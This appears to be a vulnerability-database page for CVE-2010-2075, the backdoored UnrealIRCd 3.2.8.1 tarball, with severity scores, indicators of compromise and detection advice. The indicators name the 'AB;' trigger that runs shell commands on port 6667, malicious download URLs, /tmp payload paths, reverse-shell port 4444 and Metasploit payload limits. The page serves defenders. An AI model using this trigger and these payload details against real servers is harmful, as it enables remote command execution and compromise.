cbcvebase.
CVE-2010-2075
published 2010-06-15

CVE-2010-2075: UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse)…

PriorityP274high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
83.53%
99.6th percentile
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

Affected

1 ranges
VendorProductVersion rangeFixed in
unrealircdunrealircd

Detection & IOCsextracted from sources · hover to see the quote

commandAB;
port6667
port4444
urlhttp://packetstormsecurity.org/groups/synnergy/bindshell-unix
urlhttp://efnetbs.webs.com/bot.txt
urlhttp://efnetbs.webs.com/r.txt
path/tmp/bindshell
path/tmp/bot
path/tmp/rshell
filenameUnreal3.2.8.1.tar.gz
  • Detect the backdoor trigger string 'AB;' sent as the first bytes of a TCP connection to the IRC port (default 6667); any data following 'AB;' on the same line is executed as a shell command on the server.
  • Monitor for IRC server processes spawning child processes (e.g., /bin/sh) or making outbound connections to port 4444, which is indicative of a reverse shell established via the backdoor.
  • Alert on wget activity from /tmp by the ircd process, particularly downloading and chmod +x of files, as this matches known payload delivery chains for this backdoor.
  • The backdoor is triggered via the DEBUG3_DOLOG_SYSTEM macro; look for UnrealIRCd version 3.2.8.1 in the environment as the exclusively affected version.
  • ·The backdoor was only present in the Unreal3.2.8.1.tar.gz distributed from certain mirror sites during a specific window; official/clean distributions of the same version number are not affected.
  • ·The Metasploit module requires the payload type to be one of 'generic perl ruby bash telnet'; payloads outside this set will not function with the exploit.
  • ·The exploit payload space is limited to 1024 bytes; commands exceeding this size will not be delivered successfully.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.